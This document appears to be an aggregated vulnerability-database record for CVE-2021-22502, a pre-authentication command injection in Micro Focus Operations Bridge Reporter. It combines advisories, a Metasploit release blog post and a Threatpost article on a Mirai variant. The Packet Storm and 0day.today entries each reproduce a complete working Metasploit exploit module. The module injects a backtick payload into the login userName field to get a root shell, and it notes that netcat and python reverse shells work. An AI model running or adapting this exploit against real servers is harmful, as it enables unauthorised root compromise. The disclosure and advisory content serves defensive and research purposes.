{"zdi": [{"lastseen": "2022-01-31T22:28:05", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Micro Focus Operations Bridge Reporter. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the userName parameter provided to the LogonResource endpoint. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-09T00:00:00", "type": "zdi", "title": "Micro Focus Operations Bridge Reporter userName Command Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22502"], "modified": "2021-02-09T00:00:00", "id": "ZDI-21-153", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-153/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:28:04", "description": "This vulnerability allows 
remote attackers to execute arbitrary code on affected installations of Micro Focus Operations Bridge Reporter. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the Token parameter provided to the LogonResource endpoint. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-09T00:00:00", "type": "zdi", "title": "Micro Focus Operations Bridge Reporter Token Command Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22502"], "modified": "2021-06-29T00:00:00", "id": "ZDI-21-154", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-154/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T14:15:20", "description": "Remote Code execution vulnerability in Micro Focus Operation Bridge Reporter (OBR) product, affecting version 
10.40. The vulnerability could be exploited to allow Remote Code Execution on the OBR server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-08T22:15:00", "type": "cve", "title": "CVE-2021-22502", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22502"], "modified": "2021-04-30T23:38:00", "cpe": ["cpe:/a:microfocus:operation_bridge_reporter:10.40"], "id": "CVE-2021-22502", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22502", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microfocus:operation_bridge_reporter:10.40:*:*:*:*:*:*:*"]}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:33:39", "description": "A remote code execution vulnerability exists in Micro Focus Operations Bridge Reporter. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-05T00:00:00", "type": "checkpoint_advisories", "title": "Micro Focus Operations Bridge Reporter Remote Code Execution (CVE-2021-22502)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22502"], "modified": "2021-04-05T00:00:00", "id": "CPAI-2021-0158", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-04-30T15:30:58", "description": "", "cvss3": {}, "published": "2021-04-30T00:00:00", "type": "packetstorm", "title": "Micro Focus Operations Bridge Reporter Unauthenticated Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22502"], "modified": "2021-04-30T00:00:00", "id": "PACKETSTORM:162408", "href": "https://packetstormsecurity.com/files/162408/Micro-Focus-Operations-Bridge-Reporter-Unauthenticated-Command-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# 
Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Micro Focus Operations Bridge Reporter Unauthenticated Command Injection', \n'Description' => %q{ \nThis module exploits a command injection vulnerability on *login* (yes, you read that right) \nthat affects Micro Focus Operations Bridge Reporter on Linux, versions 10.40 and below. \nIt's a straight up command injection, with little escaping required and it works before \nauthentication. \nThis module has been tested on the Linux 10.40 version. Older versions might be affected, \ncheck the advisory for details. \n}, \n'Author' => \n[ \n'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2021-22502'], \n['ZDI', '21-153'], \n['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md'], \n['URL', 'https://softwaresupport.softwaregrp.com/doc/KM03775947'] \n], \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 1024, # This should be a safe value, it might take much more \n'DisableNops' => true, \n# avoid null char and the injection char (`) \n'BadChars' => \"\\x00\\x60\", \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n# all of these (and more) should exist in a standard RHEL / SuSE \n# ... 
which are the only two distros supported by Micro Focus OBR \n# (telnet doesn't seem to work though) \n# \n# all reverse shells were tested and work flawlessly \n'RequiredCmd' => 'netcat openssl generic python' \n} \n}, \n'Targets' => \n[ \n[ 'Micro Focus Operations Bridge Reporter (Linux) versions <= 10.40', {} ], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => '2021-02-09' \n) \n) \n \nregister_options( \n[ \n# normal (no SSL) port is 21411 \nOpt::RPORT(21412), \nOptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]), \nOptString.new('TARGETURI', [true, 'Application path', '/']) \n] \n) \nend \n \ndef check \nres = send_request_raw({ \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI'], '/AdminService/urest/v1/LogonResource'), \n'headers' => { 'Content-Type' => 'application/json' }, \n'data' => rand_text_alpha(10..64) \n}, 10) \n \nif res && res.code == 400 && res.body.include?('Unrecognized token') \n# should return a stack trace like \n# Unrecognized token '#{data}': was expecting ('true', 'false' or 'null') \n# at [Source: org.glassfish.jersey.message.internal.ReaderInterceptorExecutor$UnC (...) 
\nreturn Exploit::CheckCode::Detected \nend \n \nreturn Exploit::CheckCode::Unknown \nend \n \ndef exploit \n# if there are any 0x22 (\") chars in the encoded payload, escape them with a backslash \n# we have to do this manually, the encoder is not smart enough to do it, and it will \n# fail if we put 0x22 as a bad char above \npayload_enc = payload.encoded.gsub('\"', '\\\\\"') \n \n# we use 0x60 (`) for injection, but there are lots of other possibilities \ndata = \"{\\\"userName\\\":\\\"#{rand_text_alpha(1..16)}`#{payload_enc}`\\\",\\\"credential\\\":\\\"#{rand_text_alpha(8..20)}\\\"}\" \n \nsend_request_raw({ \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI'], '/AdminService/urest/v1/LogonResource'), \n'headers' => { 'Content-Type' => 'application/json' }, \n'data' => data \n}, 0) \n \n# it's tricky to check the return value of the request here \n# - it might hang (no return) and give us a shell \n# - it might return 400 or 500 and give us a shell \n# - it might return 400 or 500 and give us nothing \n# so ignore it altogether and hope for the best \nprint_status(\"#{peer} - Payload sent, now wait for Shelly, if she doesn't arrive try again!\") \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162408/microfocus_obr_cmd_injection.rb.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2021-12-19T03:20:07", "description": "This Metasploit module exploits a command injection vulnerability on login that affects Micro Focus Operations Bridge Reporter on Linux, versions 10.40 and below. It is a straight up command injection, with little escaping required, and it works before authentication. 
This module has been tested on the Linux 10.40 version.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-30T00:00:00", "type": "zdt", "title": "Micro Focus Operations Bridge Reporter Unauthenticated Command Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22502"], "modified": "2021-04-30T00:00:00", "id": "1337DAY-ID-36171", "href": "https://0day.today/exploit/description/36171", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Micro Focus Operations Bridge Reporter Unauthenticated Command Injection',\n 'Description' => %q{\n This module exploits a command injection vulnerability on *login* (yes, you read that right)\n that affects Micro Focus Operations Bridge Reporter on Linux, versions 10.40 and below.\n It's a straight up command injection, with little escaping 
required and it works before\n authentication.\n This module has been tested on the Linux 10.40 version. Older versions might be affected,\n check the advisory for details.\n },\n 'Author' =>\n [\n 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2021-22502'],\n ['ZDI', '21-153'],\n ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md'],\n ['URL', 'https://softwaresupport.softwaregrp.com/doc/KM03775947']\n ],\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 1024, # This should be a safe value, it might take much more\n 'DisableNops' => true,\n # avoid null char and the injection char (`)\n 'BadChars' => \"\\x00\\x60\",\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n # all of these (and more) should exist in a standard RHEL / SuSE\n # ... which are the only two distros supported by Micro Focus OBR\n # (telnet doesn't seem to work though)\n #\n # all reverse shells were tested and work flawlessly\n 'RequiredCmd' => 'netcat openssl generic python'\n }\n },\n 'Targets' =>\n [\n [ 'Micro Focus Operations Bridge Reporter (Linux) versions <= 10.40', {} ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2021-02-09'\n )\n )\n\n register_options(\n [\n # normal (no SSL) port is 21411\n Opt::RPORT(21412),\n OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]),\n OptString.new('TARGETURI', [true, 'Application path', '/'])\n ]\n )\n end\n\n def check\n res = send_request_raw({\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], '/AdminService/urest/v1/LogonResource'),\n 'headers' => { 'Content-Type' => 'application/json' },\n 'data' => rand_text_alpha(10..64)\n }, 10)\n\n if res && res.code == 400 && res.body.include?('Unrecognized token')\n # should return a stack trace like\n # Unrecognized token '#{data}': was expecting ('true', 'false' or 'null')\n # at [Source: 
org.glassfish.jersey.message.internal.ReaderInterceptorExecutor$UnC (...)\n return Exploit::CheckCode::Detected\n end\n\n return Exploit::CheckCode::Unknown\n end\n\n def exploit\n # if there are any 0x22 (\") chars in the encoded payload, escape them with a backslash\n # we have to do this manually, the encoder is not smart enough to do it, and it will\n # fail if we put 0x22 as a bad char above\n payload_enc = payload.encoded.gsub('\"', '\\\\\"')\n\n # we use 0x60 (`) for injection, but there are lots of other possibilities\n data = \"{\\\"userName\\\":\\\"#{rand_text_alpha(1..16)}`#{payload_enc}`\\\",\\\"credential\\\":\\\"#{rand_text_alpha(8..20)}\\\"}\"\n\n send_request_raw({\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], '/AdminService/urest/v1/LogonResource'),\n 'headers' => { 'Content-Type' => 'application/json' },\n 'data' => data\n }, 0)\n\n # it's tricky to check the return value of the request here\n # - it might hang (no return) and give us a shell\n # - it might return 400 or 500 and give us a shell\n # - it might return 400 or 500 and give us nothing\n # so ignore it altogether and hope for the best\n print_status(\"#{peer} - Payload sent, now wait for Shelly, if she doesn't arrive try again!\")\n end\nend\n", "sourceHref": "https://0day.today/exploit/36171", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-05-14T14:54:19", "description": "## Two new Active Directory attacks\n\n\n\nThis week we added [a pair of new post-exploitation modules](<https://github.com/rapid7/metasploit-framework/pull/11130>) from community contributor [timb-machine](<https://github.com/timb-machine>). Both modules target UNIX machines running SSSD or One Identity's Vintela Authentication Services (VAS) as Active Directory integration solutions. 
The new [UNIX Gather Cached AD Hashes](<https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/unix_cached_ad_hashes.md>) module can be used on a UNIX target to obtain all cached Active Directory hashes, which can then be cracked using John the Ripper. The second module is [UNIX Gather Kerberos Tickets](<https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/unix_kerberos_tickets.md>), which as the name suggests, can similarly be used on a vulnerable target to obtain cached Kerberos tickets.\n\n## Focusing on Micro Focus\n\nThanks to [pedrib](<https://github.com/pedrib>) for two new pull requests related to Micro Focus Operations Bridge Manager and Bridge Reporter. Pedrib contributed a new [Micro Focus Operations Bridge Reporter Unauthenticated Command Injection ](<https://github.com/rapid7/metasploit-framework/pull/15090>) module, which exploits an unauthenticated command injection vulnerability on Linux, versions 10.40 and below ([CVE-2021-22502](<https://attackerkb.com/topics/lGSaEhn81Z/cve-2021-22502?referrer=blog>)). Pedrib also [updated](<https://github.com/rapid7/metasploit-framework/pull/15087>) the existing [Micro Focus Operations Bridge Manager Local Privilege Escalation](<https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/local/microfocus_operations_privesc.md>) module to also support Operations Bridge Reporter.\n\n## PR #15000!\n\nCongratulations to [pingport80](<https://github.com/pingport80>), who snagged [PR #15,000](<https://github.com/rapid7/metasploit-framework/pull/15000>)! 
This enhancement replaces existing usages of `which` in `Msf::Sessions::CommandShell.binary_exists` with `command -v` \u2014 a more portable solution that works consistently across different shells.\n\n## New Module Content (6)\n\n * [GravCMS Remote Command Execution](<https://github.com/rapid7/metasploit-framework/pull/15030>) by Mehmet Ince, which exploits [CVE-2021-21425](<https://attackerkb.com/topics/DXBeSBbvfn/cve-2021-21425?referrer=blog>) \\- This adds a new remote exploit module that leverages an unauthenticated arbitrary YAML write/update vulnerability to get remote code execution in the context of the web server user. This vulnerability has been fixed in the admin component version 1.10.10, which was released with GravCMS version 1.7.9.\n * [Micro Focus Operations Bridge Reporter Unauthenticated Command Injection](<https://github.com/rapid7/metasploit-framework/pull/15090>) by Pedro Ribeiro, which exploits [CVE-2021-22502](<https://attackerkb.com/topics/lGSaEhn81Z/cve-2021-22502?referrer=blog>). 
This is an unauthenticated OS command injection vulnerability in the Micro Focus Operations Bridge Reporter.\n * [IGEL OS Secure VNC/Terminal Command Injection RCE](<https://github.com/rapid7/metasploit-framework/pull/14947>) by James Brytan, James Smith, Marisa Mack, Rob Vinson, Sergey Pashevkin, and Steven Laura - This adds a new module that exploits an unauthenticated command injection vulnerability in the Secure Terminal and Secure Shadow services in various versions of IGEL OS.\n * [Google Chrome versions before 89.0.4389.128 V8 XOR Typer Out-Of-Bounds Access RCE](<https://github.com/rapid7/metasploit-framework/pull/15105>) by Bruno Keith (bkth_), Grant Willcox (tekwizz123), Niklas Baumstark (_niklasb), and Rajvardhan Agarwal (r4j0x00), which exploits [CVE-2021-21220](<https://attackerkb.com/topics/guR2zJ2y2K/cve-2021-21220?referrer=blog>) \\- This adds an exploit module for a Chrome V8 XOR typer OOB Access RCE that was found in the 2021 Pwn2Own competition by Dataflow Security's Niklas Baumstark (@niklasb) and Bruno Keith (@bkth). 
\nNote that this module will require you to run Chrome without the sandbox enabled as it does not come with a sandbox escape.\n * [UNIX Gather Cached AD Hashes](<https://github.com/rapid7/metasploit-framework/pull/11130>) by Tim Brown - Retrieves cached Active Directory credentials from two different solutions on UNIX (SSSD and VAS).\n * [UNIX Gather Kerberos Tickets](<https://github.com/rapid7/metasploit-framework/pull/11130>) by Tim Brown - Retrieves cached Kerberos tickets from two different solutions on UNIX (SSSD and VAS).\n\n## Enhancements and features\n\n * [#14831](<https://github.com/rapid7/metasploit-framework/pull/14831>) from [agalway-r7](<https://github.com/agalway-r7>) \\- Updates the HttpClient mixin with a new cookie jar implementation which correctly updates and merges the `Set-Cookie` header responses when using the `send_request_cgi` `keep_cookies` option\n * [#15000](<https://github.com/rapid7/metasploit-framework/pull/15000>) from [pingport80](<https://github.com/pingport80>) \\- Replaces the use of the `which` command with `command -v` giving us a more portable solution\n * [#15087](<https://github.com/rapid7/metasploit-framework/pull/15087>) from [pedrib](<https://github.com/pedrib>) \\- The `exploit/windows/local/microfocus_operations_privesc` module now supports both vulnerable Operations Bridge Manager installations and vulnerable Operations Bridge Reporter installations, with the new additional target being Operations Bridge Reporter.\n * [#15096](<https://github.com/rapid7/metasploit-framework/pull/15096>) from [pingport80](<https://github.com/pingport80>) \\- This adds shell session support to the `post/windows/gather/checkvm` module. 
This also notably adds cross-platform support for getting a list of running processes using shell and Meterpreter sessions.\n * [#15136](<https://github.com/rapid7/metasploit-framework/pull/15136>) from [pedrib](<https://github.com/pedrib>) \\- Update the `exploit/multi/http/microfocus_ucmdb_unauth_deser` module default Linux payload from `cmd/unix/generic` to `cmd/unix/reverse_python`.\n * [#15138](<https://github.com/rapid7/metasploit-framework/pull/15138>) from [h00die](<https://github.com/h00die>) \\- This enhances the `auxiliary/scanner/http/dell_idrac` module by cleaning up the code, adding the `last_attempted_at` field to `create_credential_login` to prevent a crash, and adding documentation for the module.\n\n## Bugs Fixed\n\n * [#15111](<https://github.com/rapid7/metasploit-framework/pull/15111>) from [timwr](<https://github.com/timwr>) \\- This fixes an issue in how some Meterpreter session types would inconsistently run commands issued through `sessions -c`.\n * [#15116](<https://github.com/rapid7/metasploit-framework/pull/15116>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- This fixes a bug that would occur when importing newer Acunetix reports into the database due to a change in how the timestamp is formatted.\n * [#15120](<https://github.com/rapid7/metasploit-framework/pull/15120>) from [pedrib](<https://github.com/pedrib>) \\- Fixes a regression within `tools/modules/module_author.rb ` so that it runs without crashing\n * [#15140](<https://github.com/rapid7/metasploit-framework/pull/15140>) from [wvu-r7](<https://github.com/wvu-r7>) \\- `msftidy_docs.rb` now doesn't double warn on optional (and missing) `Options` headers.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 
6.0.42...6.0.43](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-04-29T10%3A54%3A48-05%3A00..2021-05-05T09%3A27%3A49-04%3A00%22>)\n * [Full diff 6.0.42...6.0.43](<https://github.com/rapid7/metasploit-framework/compare/6.0.42...6.0.43>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-05-07T19:41:01", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21220", "CVE-2021-21425", "CVE-2021-22502"], "modified": "2021-05-07T19:41:01", "id": "RAPID7BLOG:C2CC0386EE87831FE7800DF7026FCE2D", "href": "https://blog.rapid7.com/2021/05/07/metasploit-wrap-up-110/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-03-17T20:47:24", "description": "A new variant of the Mirai botnet has been discovered targeting a slew of vulnerabilities in unpatched D-Link, Netgear and SonicWall devices \u2014 as well as never-before-seen flaws in unknown internet-of-things (IoT) gadgets.\n\nSince Feb. 16, the new variant has been targeting six known vulnerabilities \u2013 and three previously unknown ones \u2013 in order to infect systems and add them to a botnet. 
It\u2019s only the latest variant of Mirai [to come to light](<https://threatpost.com/new-mirai-variant-mukashi-targets-zyxel-nas-devices/153982/>), years after source code for the malware [was released](<https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/>) in October 2016.\n\n\u201cThe attacks are still ongoing at the time of this writing,\u201d said researchers with Palo Alto Networks\u2019 Unit 42 team [on Monday](<https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/>). \u201cUpon successful exploitation, the attackers try to download a malicious shell script, which contains further infection behaviors such as downloading and executing Mirai variants and brute-forcers.\u201d\n\n## **Initial Exploit: New and Old Flaws**\n\nThe attacks leverage a number of vulnerabilities. The known vulnerabilities exploited include: A SonicWall SSL-VPN exploit; a D-Link DNS-320 firewall exploit ([CVE-2020-25506](<https://nvd.nist.gov/vuln/detail/CVE-2020-25506>)); Yealink Device Management remote code-execution (RCE) flaws ([CVE-2021-27561 and CVE-2021-27562](<https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/>)); a Netgear ProSAFE Plus RCE flaw ([CVE-2020-26919](<https://nvd.nist.gov/vuln/detail/CVE-2020-26919>)); an RCE flaw in Micro Focus Operation Bridge Reporter ([CVE-2021-22502](<https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md>)); and a Netis WF2419 wireless router exploit ([CVE-2019-19356](<https://nvd.nist.gov/vuln/detail/CVE-2019-19356>) ).\n\nPatches are available for all of these flaws; the botnet is targeting devices that have not yet applied the available updates.\n\nFor instance, \u201cthe VisualDoor exploit in question targets an old SSL-VPN firmware vulnerability that was patched on legacy products in 2015 with 7.5.1.4-43sv and 8.0.0.4-25sv releases,\u201d a SonicWall spokesperson told Threatpost. 
\u201cIt is not viable against any properly patched SonicWall appliances.\u201d\n\nThe botnet also exploited vulnerabilities that were not previously identified. Researchers believe that these flaws exist in IoT devices.\n\n\u201cWe cannot say with certainty what the targeted devices are for the unidentified exploits,\u201d Zhibin Zhang, principal researcher for Unit 42, told Threatpost. \u201cHowever, based off of the other known exploits in the samples, as well as the nature of exploits historically selected to be incorporated with Mirai, it is highly probable they target IoT devices.\u201d\n\nThe exploits themselves include two RCE attacks \u2014 including an exploit targeting a command-injection vulnerability in certain components; and an exploit targeting the Common Gateway Interface (CGI) login script (stemming from a key parameter not being properly sanitized). The third exploit targets the op_type parameter, which is not properly sanitized leading to a command injection, said researchers.\n\nThe latter has \u201cbeen observed in the past being [used by [the] Moobot [botnet]](<https://threatpost.com/mootbot-fiber-routers-zero-days/154962/>), however the exact target is unknown,\u201d researchers noted. Threatpost has reached out to researchers for further information on these unknown targets.\n\n## **Mirai Botnet: A Set of Binaries**\n\nAfter initial exploitation, the malware invokes the wget utility (a legitimate program that retrieves content from web servers) in order to download a shell script from the malware\u2019s infrastructure. The shell script then downloads several Mirai binaries and executes them, one-by-one.\n\nOne such binary includes lolol.sh, which has multiple functions. 
Lolol.sh deletes key folders from the target machine (including ones with existing scheduled jobs and startup scripts); creates packet filter rules to bar incoming traffic directed at the commonly-used SSH, HTTP and telnet ports (to make remote access to the affected system more challenging for admins); and schedules a job that aims to rerun the lolol.sh script every hour (for persistence). Of note, this latter process is flawed, said researchers, as the cron configuration is incorrect.\n\nAnother binary (install.sh) downloads various files and packages \u2013 including GoLang v1.9.4, the \u201cnbrute\u201d binaries (that [brute-force various credentials](<https://threatpost.com/millions-brute-force-attacks-rdp/155324/>)) and the combo.txt file (which contains numerous credential combinations, to be used for brute-forcing by \u201cnbrute\u201d).\n\nThe final binary is called dark.[arch], and is based on the Mirai codebase. This binary mainly functions for propagation, either via the various initial Mirai exploits described above, or via brute-forcing SSH connections using hardcoded credentials in the binary.\n\n## **Mirai Variants Continue to Pop Up**\n\nThe variant is only the latest to rely on Mirai\u2019s source code, [which has proliferated into more than 60 variants](<https://threatpost.com/mirai-botnet-sees-big-2019-growth-shifts-focus-to-enterprises/146547/>) since bursting on the scene with a massive distributed denial of service (DDoS) [takedown of DNS provider Dyn](<https://threatpost.com/dyn-confirms-ddos-attack-affecting-twitter-github-many-others/121438/>) in 2016.\n\nLast year, a Mirai variant was found [targeting Zyxel network-attached storage (NAS) devices](<https://threatpost.com/new-mirai-variant-mukashi-targets-zyxel-nas-devices/153982/>) using a critical vulnerability that was only recently discovered, according to security researchers. 
In 2019, [a variant of the botnet](<https://threatpost.com/mirai-enterprise-systems/142889/>) was found sniffing out and targeting vulnerabilities in enterprise wireless presentation and display systems. And a 2018 variant [was used to launch a series of DDoS campaigns](<https://threatpost.com/mirai-variant-targets-financial-sector-with-iot-ddos-attacks/131056/>) against financial-sector businesses.\n\nResearchers said that the biggest takeaway here is that connected devices continue to pose a security problem for users. They strongly advised customers to apply patches whenever possible.\n\n\u201cThe IoT realm remains an easily accessible target for attackers,\u201d according to Unit 42\u2019s report. \u201cMany vulnerabilities are very easy to exploit and could, in some cases, have catastrophic consequences.\u201d\n\n**_Check out our free [upcoming live webinar events](<https://threatpost.com/category/webinars/>) \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly** ([Learn more and 